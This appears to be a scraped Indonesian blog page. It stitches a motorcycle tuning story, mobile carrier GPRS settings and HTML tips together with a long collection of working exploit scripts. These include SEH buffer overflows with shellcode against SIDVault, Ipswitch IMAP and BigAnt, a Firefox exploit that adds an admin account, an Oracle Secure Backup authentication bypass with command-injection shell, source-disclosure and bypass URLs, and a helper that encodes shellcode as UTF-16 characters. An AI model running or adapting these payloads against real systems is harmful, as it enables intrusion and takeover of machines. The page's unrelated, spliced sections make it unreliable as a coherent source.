Greetings, bikers...

  • wear an SNI-certified helmet
  • carry complete vehicle papers
  • check the bike before you set off
  • in short, safety first...
Here I want to share my experience as a Suzuki Thunder 125 owner. As all you fellow bikers probably know, the bike has a big body but only 125cc, so you can imagine how it runs on the road..

I kept imagining how I wanted that bike to run; after reading here and there it turned out many people suggest changing the carburetor, changing the coil, changing this and that... it made my head spin, why not just buy a fast bike instead..
So in the end I tinkered with it myself. Armed with a set of wrenches I started by taking off the cylinder head, then replaced the standard Suzuki Thunder piston with a Honda Tiger oversize 75 piston. The easy way is to take it to a lathe shop and ask them to machine it to size so the Tiger piston fits the Thunder cylinder, because it has to be turned first so that the piston and its pin fit the Thunder's internals.

Not satisfied with raising the combustion chamber capacity, I went for the heart of the bike and replaced the carburetor with an RX King one.
Fitting a King carb to a Suzuki Thunder turned out to be not as easy as I thought; the King carb does not bolt straight onto the standard Thunder intake, so in the end I replaced the intake manifold with a Satria FU manifold. The result: it mounts directly in place of the standard Thunder manifold with no further modification of the bolt holes, because the Satria FU and Thunder manifold bolt holes are similar and line up. Plus the carb clamp has to be replaced; for the carb clamp I tried a cheap and cheerful one, a clamp bought at a hardware store for only 6000 rupiah.

To balance a bike that now has a King carb plus the new piston, it is nice to also swap the coil for one from a TS125, or if that is hard to find, a Honda Kharisma coil can be used as well..

Alhamdulillah, my Thunder is no longer embarrassing on the road. That is a little of my experience,


The carb clamp

Satria FU carburetor intake manifold



Greetings, bikers....

GPRS SETTINGS, INDONESIA ONLY

MENTARI
OTA setup via SMS:
Send an SMS to 3000 with the message:
Type: GPRS[space] phone brand[space] phone model

Manual setup:
GPRS

Profile Name : INDOSATGPRS
Homepage URL : http://wap.klub-mentari.com
IP Address : 10.19.19.19
Bearer : GPRS
User Name : indosat
Password : indosat
APN : indosatgprs

MMS
Profile Name : INDOSATGPRS
Homepage URL : http://mmsc.indosat.com
IP Address : 10.19.19.19:8080
Bearer : GPRS
User Name : indosat
Password : indosat
APN : indosatmms

===================================================
IM3

OTA setup via SMS:
Send an SMS to 3939 with the message:
Type: GPRS[space] phone brand[space] phone model

Manual setup:

GPRS

Connection name : M3-GPRS
Access point name : www.indosat-m3.net
User name : gprs
Password : im3
Authentication : Normal
Homepage : http://wap.indosat-m3.net
IP address : 010.019.019.019
Port : 9201 (standard), 8080 (proxy)

MMS
Connection name : M3-MMS
Access point name : indosatmms
User name : indosatmms
Password : indosatmms
Authentication : Normal
Homepage : http://mmsc.indosat-m3.net
IP address : 010.019.019.019
Port : 9201 (standard), 8080 (proxy)

===================================================
KARTU SIMPATI/KARTU AS

Send an SMS to 6616 with the message:
Type: GPRS[space] the number printed on the back of your SIM card (the ICCID, Integrated Circuit Card Identification number)
Then wait a moment; you will receive an SMS confirming that your GPRS application is being processed. This takes about 48 hours. Once GPRS is active you will receive another SMS notification stating that GPRS has been activated.

Manual setup:

GPRS

Profile Name : TSEL GPRS
APN : Telkomsel
User name : wap
Password : wap123
Authentication : Normal
Gateway IP address : 10.1.89.130
Homepage : http://wap.telkomsel.com
Data Bearer : GPRS
Proxy port number : 9201 or 8000

MMS

Connection Name: tel-MMS
Data Bearer: GPRS
Access Point Name: mms
Username: wap
Prompt Password: No
Password: wap123
Authentication: Normal
Proxy address: 10.1.89.150
Homepage: http://mms.telkomsel.com/
Connection Security: Off

===================================================
XL
OTA setup via SMS:
Send an SMS containing: GPRS[space][space] to 9667
Send an SMS containing: MMS[space][space] to 9667

Manual setup:

GPRS

Connection Name: XL-GPRS
Data Bearer: GPRS
Access Point Name: www.xlgprs.net
Username: xlgprs
Prompt Password: No
Password: proxl
Authentication: Normal
Homepage: http://wap.lifeinhand.com
Connection Security: Off
Session Mode: Permanent
IP Address: Automatic
Proxy Server Address: 202.152.240.050
Proxy Port Number: 8080


MMS

Connection Name: XL-MMS
Data Bearer: GPRS
Access Point Name: www.xlmms.net
Username: xlgprs
Prompt Password: No
Password: proxl
Authentication: Normal
Homepage: http://mmc.xl.net.id/servlets/mms
Connection Security: Off
Session Mode: Permanent
IP Address: Automatic
Proxy Server Address: 202.152.240.050
Proxy Port Number: 8080

===================================================
3 (THREE)
Manual setup:

GPRS

Settings’ Name: 3-GPRS
Homepage : http://wap.three.co.id/
Proxies : Enable
Proxy address : 10.4.0.10
Port : 3128
GPRS access point : 3gprs
Authentication type : Normal
Login type : Automatic
Username : 3gprs
Password : 3gprs

MMS

Settings’ name : 3-MMS
Homepage : http://mms.hutch.co.id/
GPRS access point : 3mms
Authentication type : Normal
Username : 3mms
Password : 3mms
Allow adverts : No

===================================================
AXIS

General GPRS parameters
Connection Name : AXIS
Data Bearer : GPRS or PS
Access Point Name (APN) : AXIS
Username : AXIS
Prompt Password : No
Password : 123456
Authentication : Normal
Gateway/Proxy IP Address : 10.8.3.8
Gateway/Proxy Port : 9201 or 8080
Homepage : http://wap.axisworld.co.id
Connection Security : Off
Session Mode : Permanent

General MMS parameters
Connection Name : AXISmms
Data Bearer : GPRS or PS
Access Point Name (APN) : AXISmms
Username : AXIS
Prompt Password : No
Password : 123456
Authentication : Normal
Gateway/Proxy IP Address : 10.8.3.8
Gateway/Proxy Port : 9201 or 8080
Homepage / MMS Server : http://mmsc.AXIS
Connection Security : Off
Session Mode : Permanent

===================================================
MATRIX
OTA setup:
Send an SMS to 888 with the message:
ACT[space]GPRS

how to write html code on blogs
A blog page will not display HTML code literally on its own: the browser renders the tags instead of showing them. Example:
<html>
<title></title>
<body>
<b>html code</b>
</body>
</html>

To be able to write HTML code in your blog posting, you can use an HTML code converter tool, which replaces the markup characters with their HTML entities so that the browser displays the code as text.
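What such a converter does, as an added example (my own code, not a tool from this page): it turns every character the browser would treat as markup into its entity, so the snippet is displayed instead of rendered. The same escaping is what keeps visitor-supplied text in a comment from being interpreted as HTML.

```python
import html

# Characters HTML treats as markup or as an attribute delimiter, with the
# entity that displays them literally. Escaping one character at a time means
# an entity we emit is never itself re-escaped.
HTML_ENTITIES = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
}


def escape_html(text):
    """Return `text` with every markup character replaced by its entity."""
    return "".join(HTML_ENTITIES.get(ch, ch) for ch in text)


def to_code_block(snippet):
    """Wrap escaped source in <pre><code> so line breaks and spacing survive."""
    return "<pre><code>" + escape_html(snippet) + "</code></pre>"


def is_safe_text(text):
    """True if `text` contains nothing the browser could parse as markup."""
    return not any(ch in HTML_ENTITIES for ch in text)


if __name__ == "__main__":
    # Constructed sample: the snippet from the post above.
    sample = "<html>\n<title></title>\n<body>\n<b>html code</b>\n</body>\n</html>"
    print(to_code_block(sample))
    # Cross-check against the standard library's escaper.
    assert escape_html(sample) == html.escape(sample, quote=True)
```

Paste the output of `to_code_block` into the post body; the browser shows the original tags as text.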

A spoiler is a way to hide all or part of the blog's content until the reader opens it.
Sample:

TITLE :

[SPOILER CONTENT]

The following code:

how to make text areas on web pages.

This may be nothing new to you if you are familiar with HTML code and JavaScript, but the tutorial here is just for beginners like me.
This is a sample:


The following code:

SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)

#!/usr/bin/python

import socket, sys, ldap

print "[*] SidVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)"
print "[*] Original author : blake"
print "[*] Seh Exploit : Skull-Hacker"
print "[*] Tested on Windows XP SP3"

if len(sys.argv)!=2:
    print "[*] Usage: %s <ip>" % sys.argv[0]
    sys.exit(0)


# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c"
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45"
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66"
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f"
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59"
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a"
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44"
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77"
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a"
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b"
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57"
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f"
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73"
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39"
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45"
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45"
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41")


sploit = "\x41"*1028                    # filler up to the overwritten region
sploit += "SKH" #Trick track ;)
sploit += shellcode
sploit += "\x44"*(3299-len(shellcode))    # pad so the SEH record lands at a fixed offset
sploit += "\xE8\x18\xF3\xFF\xFF"          # call rel32 -0xCE8: lands exactly at the start of shellcode
sploit += "\x44"*5
sploit += "\xEB\xF4\x90\x90"              # nSEH: short jmp back 12 bytes, onto the call above
sploit += "\x29\x10\x40" #univ ret        # SEH: 0x00401029; the LDAP string terminator supplies the null byte

print "[+] Sending payload"

l = ldap.open(sys.argv[1])
l.simple_bind("dc=" +sploit, "\x42" * 256)
print "[+] Done!\n"

#########################################################
#
# Xerver HTTP Server v4.32 Remote Arbitrary Source Code Disclosure
# Found By: Dr_IDE
# Download: http://www.javascript.nu/xerver
# Tested On: Windows XPSP3
#
#########################################################

- Description -

Xerver v4.32 is a Windows based HTTP server. This is the latest version of
the application available.

Xerver v4.32 is vulnerable to remote arbitrary source code disclosure by the
following means.

- Notes -
1. This is remote only.
2. Out of the box this server is completely insecure and wide open;
my configuration is attached below in case reproduction is an issue.


- Technical Details -

http://[ webserver IP]/[ file ]::$DATA

The ::$DATA suffix names the file's default NTFS data stream, so the operating
system opens the same file, while a server that chooses its handler by file
extension (see the php/pl/cgi mapping in the configuration below) no longer
matches .asp or .php and returns the raw file as a static document.


- Sample Case 1 -

http://172.16.2.101/index.html::$DATA

- Remote Browser Output -

<html><head></head><body> This is my Web page </body></html>


- Sample Case 2 -

http://172.16.2.101/default.asp::$DATA

- Remote Browser Output -

<html>
<body>
<%
response.write("My first ASP script!")
%>
</body>
</html>

- My Server Configuration-

Filename: Xerver2.cfg

----------------------snip-------------------------------------------------------------------------
80
index.html,index.htm,index.shtml,default.html,default.asp,index.php,index.phtml,index.pl,index.cgi
c:\INETPUB\

c:\INETPUB\
php=php,php3=php,php4=php,phtml=php,pl=perl,cgi=perl,exe=,bat=


0
0
0
2
1
XerverWebserver.log
----------------------snip-------------------------------------------------------------------------

#!/usr/bin/python
# -*- coding: utf-8 -*-
# FireFox 2.0.0.16 Windows XP SP3 x86 Remote Exploit
# Author: Dominic Chell <dmc@deadbeef.co.uk>
#
# Exploits the UTF-8 URL overflow vulnerability described in CVE-2008-0016.
# As of September 2009 there are no public exploits for this vulnerability.
# However, according to securityfocus an exploit is available in both Canvas
# and Core Impact.
#
# Thanks to meta and ChrisA

from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys

# Adduser shellcode encoded with shikata_ga_nai
# USER=r00t PASS=r00tr00t!!
egg = (
"\xda\xd4\x29\xc9\xb8\xb3\xfe\x8b\x54\xd9\x74\x24\xf4\xb1\x32"
"\x5f\x83\xef\xfc\x31\x47\x14\x03\x47\xa7\x1c\x7e\xa8\x2f\xa4"
"\x81\x51\xaf\xae\xc7\x6d\x24\xcc\xc2\xf5\x3b\xc2\x46\x4a\x23"
"\x97\x06\x75\x52\x4c\xf1\xfe\x60\x19\x03\xef\xb9\xdd\x9d\x43"
"\x3d\x1d\xe9\x9c\xfc\x54\x1f\xa2\x3c\x83\xd4\x9f\x94\x70\x11"
"\x95\xf1\xf2\x46\x71\xf8\xef\x1f\xf2\xf6\xa4\x54\x5b\x1a\x3a"
"\x80\xef\x3e\xb7\x57\x1b\xb7\x9b\x73\xdf\x04\x7c\x4d\x29\xea"
"\xd5\xc9\x5e\xac\xe9\x9a\x21\x3c\x81\xed\xbd\x91\x1e\x65\xb6"
"\x60\xd8\xf5\x06\x18\x49\x92\x76\x56\x6d\x3d\x1f\xfe\x90\x4b"
"\xd1\xa9\x93\xab\x8d\x38\x08\x1a\x37\xba\xb5\x42\x98\x59\x16"
"\xed\x83\xe9\x76\x84\x38\x74\x05\x46\xcd\x46\xd9\xf2\x11\xd4"
"\x29\xcb\x25\x6a\x7a\x1b\xb2\xab\x5b\x7b\x15\xea\xdf\x3f\x49"
"\xca\xf9\x9f\xe7\x77\x72\xc0\x9b\x18\x19\x61\x08\x81\xaf\x0e"
"\xa5\x3d\x70\x90\x21\xd0\x19\x7c\xc3\x59\xae\xf2\x72\xe9\x21"
"\x81\x07\x31\xcc\x55\xd8\x45\x10\xb9\x59\xe1\x14\xc5\x53")

# Egghunter where egg is 0x41424142.
# The egghunter is encoded as HTML entities, this evades the unicode conversion.
# (This copy has the entities decoded to literal characters; each character's
# UTF-16 code unit carries two bytes of the egghunter, so the characters must
# survive unchanged for the bytes to line up.)
# Egghunter courtesy of skape. Modified to xor edx,edx as first instruction.
shellcode = (
"툳邐邐䊐橒堂⻍"
"Լ瑚룯䅂䅂懲疯"
"꿪쳌쳌쳌쳌"
"쳌쳌쳌쳌")

# The UTF-8 character in the URL triggers the code path where the overflow occurs.
s = "\xC3\xBA"
u = unicode(s, "utf-8")
utf8chars = u.encode( "utf-8" )

class myRequestHandler(BaseHTTPRequestHandler):

    def create_exploit_buffer(self):
        html = "<meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\" />\n<html>\n<body>\n"

        # Store the egg and adduser shellcode in CDATA
        # The egghunter will try and find this in memory
        html += "<!CDATA[" + "\x42\x41\x42\x41\x42\x41\x42\x41" + egg
        html += "]>\n"

        html += "<a href=\""
        html += "\x01"
        html += "xx://dmc"
        html += utf8chars
        html += "/"

        html += "邐" * 1700 # Windows XP SP3 SEH offset
        html += "ძ邐" # unicode - ptr to next seh "\xeb\x10\x90\x90";
        html += "ᇧ怷" # 0x603711e7 - pop/pop/ret - xpcom_core.dll
        html +="邐" * 10
        html += shellcode # add egghunter
        html +="邐" * 10
        html += "\" >s</a>"
        html += "\n</body>"
        html += "\n</html>"

        return html

    def do_GET(self):
        self.printCustomHTTPResponse(200)
        if self.path == "/":
            target=self.client_address[0]
            html = self.create_exploit_buffer()
            self.wfile.write(html)
            print "[*] Evil payload sent\n[*] Wait a few minutes and try connecting with r00t/r00tr00t!!\n"

    def printCustomHTTPResponse(self, respcode):
        self.send_response(respcode)
        self.send_header("Content-type", "text/html")
        self.send_header("Server", "myRequestHandler")
        self.end_headers()

print "FireFox 2.0.0.16 x86 Exploit\nAuthor: dmc@deadbeef.co.uk\n"
print "[*] Starting evil web server"
print "[*] Waiting for clients\n"

httpd = HTTPServer(('', 80), myRequestHandler)

try:
    httpd.handle_request()
    httpd.serve_forever()
except KeyboardInterrupt:
    print "\n\n[*] Interrupt caught, exiting.\n\n"
    sys.exit(1)
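The exploit above carries raw bytes through a Unicode string by choosing characters whose UTF-16 code units are the bytes it needs: 邐 is U+9090, two NOPs, and ᇧ怷 is the little-endian pop/pop/ret address 0x603711e7. What follows is an added example, my own code rather than part of the exploit, that turns a byte string into such characters or numeric character references and recovers the bytes again. It refuses the one case that cannot be carried this way: a 16-bit value in the surrogate range D800-DFFF is not a character, and a browser replaces a lone surrogate with U+FFFD, corrupting the byte stream.

```python
import struct


def bytes_to_utf16_units(data):
    """Split `data` into little-endian 16-bit code units.

    Raises ValueError for an odd length (a lone byte cannot fill a code unit)
    and for any unit in D800-DFFF (a lone surrogate would be replaced by the
    browser rather than stored as-is).
    """
    if len(data) % 2:
        raise ValueError("need an even number of bytes; pad with a NOP")
    units = []
    for i in range(0, len(data), 2):
        unit = data[i] | (data[i + 1] << 8)
        if 0xD800 <= unit <= 0xDFFF:
            raise ValueError("bytes %02x %02x form surrogate U+%04X"
                             % (data[i], data[i + 1], unit))
        units.append(unit)
    return units


def to_entities(data):
    """Hex numeric character references, the form the egghunter above used."""
    return "".join("&#x%04X;" % u for u in bytes_to_utf16_units(data))


def to_chars(data):
    """Literal characters, the form the 邐 padding above uses."""
    return "".join(chr(u) for u in bytes_to_utf16_units(data))


def from_chars(text):
    """The bytes a browser holds in memory for `text` (UTF-16LE)."""
    return text.encode("utf-16-le")


def seh_record_as_chars(nseh, handler):
    """Encode an nSEH/SEH pair (4 bytes plus a 32-bit address) for a UTF-16 overflow."""
    return to_chars(nseh + struct.pack("<I", handler))


if __name__ == "__main__":
    # Constructed sample: the SEH record the exploit above writes.
    rec = seh_record_as_chars(b"\xeb\x10\x90\x90", 0x603711e7)
    print([hex(ord(c)) for c in rec])
    print(to_entities(b"\x33\xd2\x90\x90"))  # xor edx,edx ; nop ; nop
```

When a needed address or instruction pair does fall in the surrogate range, the usual fix is to shift the alignment by one byte (a leading NOP) so different byte pairs form the code units.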

/* Ipsbitch.cpp vs Ipswitch IMAP
* Tested on: Windows 2000 SP4
* Ref: CVE-2007-2795
*
* Author: Dominic Chell <dmc@deadbeef.co.uk>
* Found this half written on a VM so decided to finish it.
*
* Payload adds a local admin account USER=r00t PASS=r00tr00t!!
*
*/

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include "winsock2.h"

#pragma comment(lib, "ws2_32")

#define usage(){ (void)fprintf(stderr, "Ipsbitch vs Ipswitch IMAP <=v9.20\n(C) dmc <dmc@deadbeef.co.uk>\n\nExample: ipsbitch.exe [ip] [port] [user] [password]\n");}
#define error(e){ (void)fprintf(stderr,"%s\n",e); return -1;}

// USER=r00t PASS=r00tr00t!!
// Bad Chars = '\x00\x0a\x0d\x0b\x09\x0c\x20'
// Encoded with shikata ga nai
char shellcode[] =
"\xda\xd4\x29\xc9\xb8\xb3\xfe\x8b\x54\xd9\x74\x24\xf4\xb1\x32"
"\x5f\x83\xef\xfc\x31\x47\x14\x03\x47\xa7\x1c\x7e\xa8\x2f\xa4"
"\x81\x51\xaf\xae\xc7\x6d\x24\xcc\xc2\xf5\x3b\xc2\x46\x4a\x23"
"\x97\x06\x75\x52\x4c\xf1\xfe\x60\x19\x03\xef\xb9\xdd\x9d\x43"
"\x3d\x1d\xe9\x9c\xfc\x54\x1f\xa2\x3c\x83\xd4\x9f\x94\x70\x11"
"\x95\xf1\xf2\x46\x71\xf8\xef\x1f\xf2\xf6\xa4\x54\x5b\x1a\x3a"
"\x80\xef\x3e\xb7\x57\x1b\xb7\x9b\x73\xdf\x04\x7c\x4d\x29\xea"
"\xd5\xc9\x5e\xac\xe9\x9a\x21\x3c\x81\xed\xbd\x91\x1e\x65\xb6"
"\x60\xd8\xf5\x06\x18\x49\x92\x76\x56\x6d\x3d\x1f\xfe\x90\x4b"
"\xd1\xa9\x93\xab\x8d\x38\x08\x1a\x37\xba\xb5\x42\x98\x59\x16"
"\xed\x83\xe9\x76\x84\x38\x74\x05\x46\xcd\x46\xd9\xf2\x11\xd4"
"\x29\xcb\x25\x6a\x7a\x1b\xb2\xab\x5b\x7b\x15\xea\xdf\x3f\x49"
"\xca\xf9\x9f\xe7\x77\x72\xc0\x9b\x18\x19\x61\x08\x81\xaf\x0e"
"\xa5\x3d\x70\x90\x21\xd0\x19\x7c\xc3\x59\xae\xf2\x72\xe9\x21"
"\x81\x07\x31\xcc\x55\xd8\x45\x10\xb9\x59\xe1\x14\xc5\x53";

char *seh = "\xC4\x2A\x02\x75";
//ws2help.dll - 0x75022AC4 - pop/pop/ret
char *nextseh = "\xeb\x10\x90\x90";
// short jmp nop nop

int main(int argc, char *argv[])
{
    SOCKET s;
    struct fd_set mask;
    struct timeval timeout;
    struct sockaddr_in server;

    char user[20], pass[20];
    char payload[2048];
    char recvbuf[1024];

    // ip, port, user and password are all required (argv[4] is read below)
    if(argc < 5)
    {
        usage();
        return 0;
    }

    if((strlen(argv[3])<15) && (strlen(argv[4])<15))
    {
        strncpy(user, argv[3], 14);
        strncpy(pass, argv[4], 14);
        user[14] = '\0';
        pass[14] = '\0';
    }
    else {
        usage();
        return 0;
    }

    // inet_addr() already returns the address in network byte order
    unsigned long ipaddr=inet_addr(argv[1]);
    int port=atoi(argv[2]);

    fprintf(stderr, "Ipsbitch vs Ipswitch IMAP <=v9.20\n(C) dmc <dmc@deadbeef.co.uk>\n\n");

    char auth[50];
    memset(auth, 0, sizeof(auth));
    memset(recvbuf, 0, sizeof(recvbuf));
    strcat(auth, "0 LOGIN ");
    strcat(auth, user);
    strcat(auth, " ");
    strcat(auth, pass);
    strcat(auth, "\r\n");

    // Oversized SEARCH BEFORE argument: 80 bytes of filler reach the SEH record,
    // then nSEH (short jmp over the handler address), the pop/pop/ret address,
    // a NOP sled and the shellcode.
    memset(payload, 0, sizeof(payload));
    strcat(payload, "2 SEARCH BEFORE ");
    for(int i=0; i<80; i++) strcat(payload, "\x90");
    strcat(payload, nextseh);
    strcat(payload, seh);
    for(int i=0; i<100; i++) strcat(payload, "\x90");
    strcat(payload, shellcode);
    for(int i=0; i<300; i++) strcat(payload, "\x90");
    strcat(payload, "\r\n");

    WSADATA info;
    if (WSAStartup(MAKEWORD(2,0), &info)) error("Unable to start WSA");

    s=socket(AF_INET,SOCK_STREAM,0);
    if (s==INVALID_SOCKET) error("[*] socket error");
    server.sin_family=AF_INET;
    server.sin_addr.s_addr=ipaddr;
    server.sin_port=htons(port);

    WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
    timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);

    select(s+1,NULL,&mask,NULL,&timeout);
    if(!FD_ISSET(s,&mask)) error("[*] connection timed out");

    fprintf(stderr, "[*] Connecting to IMAP server\n");
    Sleep(1000);recv(s,recvbuf,200,0);
    fprintf(stderr, "[*] Got banner:\n%s\n", recvbuf);
    memset(recvbuf, 0, sizeof(recvbuf));
    fprintf(stderr, "[*] Authenticating...\n");
    if (send(s,auth,strlen(auth),0)==SOCKET_ERROR) error("[*] error sending auth payload");
    memset(auth, 0, sizeof(auth));
    Sleep(1000);recv(s,recvbuf,200,0);
    fprintf(stderr, "[*] Received:\n%s\n", recvbuf);
    memset(recvbuf, 0, sizeof(recvbuf));
    fprintf(stderr, "[*] Sending SELECT command...\n");
    if (send(s,"1 SELECT INBOX\r\n",strlen("1 SELECT INBOX\r\n"),0)==SOCKET_ERROR) error("[*] error sending SELECT command");
    Sleep(1000);recv(s,recvbuf,200,0);
    fprintf(stderr, "[*] Received:\n%s\n", recvbuf);
    memset(recvbuf, 0, sizeof(recvbuf));
    Sleep(1000);recv(s,recvbuf,200,0);
    fprintf(stderr, "[*] Received:\n%s\n", recvbuf);
    fprintf(stderr, "[*] Sending exploit payload...\n");
    if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) error("[*] error sending exploit payload");
    memset(payload, 0, sizeof(payload));
    fprintf(stderr, "[*] Now try USER=r00t PASS=r00tr00t!!\n");
    return 0;
}

#!/bin/bash

#Oracle Secure Backup Administration Server authentication bypass, plus command injection vulnerability
#1-day exploit for CVE-2009-1977 and CVE-2009-1978

#PoC script successfully tested on:
#Oracle Secure Backup Server 10.3.0.1.0_win32_release
#MS Windows Professional XP SP3

#In August 2009, ZDI discloses a few details regarding a couple of interesting vulnerabilities within Oracle Backup Admin server.
#Since I was quite interested in such flaws, I did a bit of research. This PoC exploits two separate vulnerabilities: a smart
#authentication bypass and a trivial command injection, resulting in arbitrary command execution.

#References:
#http://www.zerodayinitiative.com/advisories/ZDI-09-058/
#http://www.zerodayinitiative.com/advisories/ZDI-09-059/

#Use it for ethical pentesting only! The author accepts no liability for damage caused by this tool.
#Luca "ikki" Carettoni (blog.nibblesec.org), 10th September 2009

clear
echo ":: Oracle Secure Backup Admin Server 10.3 AuthBypass/CodeExec Exploit ::"

if [[ $# -ne 1 ]]
then
    echo "usage: ./$(basename $0) <target IP>"
    echo "i.e.: ./$(basename $0) 192.168.0.100"
    exit
fi

if ! which curl >/dev/null
then
    echo "'curl' is required in order to handle HTTPS connections"
    exit
fi

TARGET=$1

#Exploiting CVE-2009-1977 and getting a valid token
echo "[+] Exploiting CVE-2009-1977 against $TARGET"
postdata="button=Login&attempt=1&mode=&tab=&uname=--fakeoption&passwd=fakepwd"
session=`curl -kis "https://$TARGET/login.php" -d "$postdata" | grep "PHPSESSID=" | head -n 1 | cut -d= -f 2 | cut -d\; -f 1`

if [[ -z $session ]]
then
    echo "[!] Fatal error. No valid token has been retrieved"
    exit
fi

echo "[+] I got a valid token: $session"

#Use a valid session and CVE-2009-1978 in order to inject arbitrary commands
echo "[+] Exploiting CVE-2009-1978 against $TARGET"
shell="1%26ver>osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
check=`curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session" | grep -i Microsoft`

if [[ -z $check ]]
then
    echo "[!] Fatal error. I cannot execute arbitrary commands"
    exit
fi

echo "[+] Enjoy your non-interactive shell! Use EXIT to clean up everything"
echo
echo \>$check

while(true); do
    echo -n \>
    read -r cmd

    if [ "$cmd" == "EXIT" ]
    then
        echo "[+] Removing the temporary file and closing"
        shell="1%26del%20osb103shelltmp"
        curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
        exit
    fi

    #URLencode function: hex-encode every byte as %xx. od wraps its output every
    #16 bytes, so the newlines it inserts for longer commands are stripped too.
    cmd=`echo -n "$cmd"|od -t x1 -A n|tr " " %|tr -d "\n"`
    shell="1%26$cmd>osb103shelltmp"
    curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
    echo "[+] Last successful command execution:"
    curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session"
done
#end

BRS Webweaver Version 1.33 /scripts access restriction bypass vulnerability

#################################################
# Author : Usman Saeed
# Company : Xc0re Security Research Group
# Homepage : http://www.xc0re.net
#################################################

[*] Download Page : http://www.brswebweaver.com/downloads.html


[*] Attack type : Remote


[*] Patch Status : Unpatched



[*] Description : The ISAPI/CGI path is [%installdirectory%/scripts] and
its alias over HTTP is [http://[host]/scripts].

The access check is that when an attacker requests /scripts directly, the
server answers with a 404 error. To bypass it, and to view the directory
listing (provided directory browsing is enabled in the server configuration),
just copy and paste the exploit URL.

The bypass of that check, rather than the listing itself, is why this is not
called a directory listing exploit.



[*] Exploitation :


[+] http://127.0.0.1/scripts/%bg%ae%bg%ae/.exe


BigAnt Server 2.50 GET Request Remote BOF Exploit [ SEH ]

# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys

if len(sys.argv)!= 3:
    print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default

# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = (
"\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x46\x44\x4c\x4b"
"\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a"
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51"
"\x4a\x4b\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
"\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x43\x37"
"\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
"\x4b\x50\x54\x46\x44\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f"
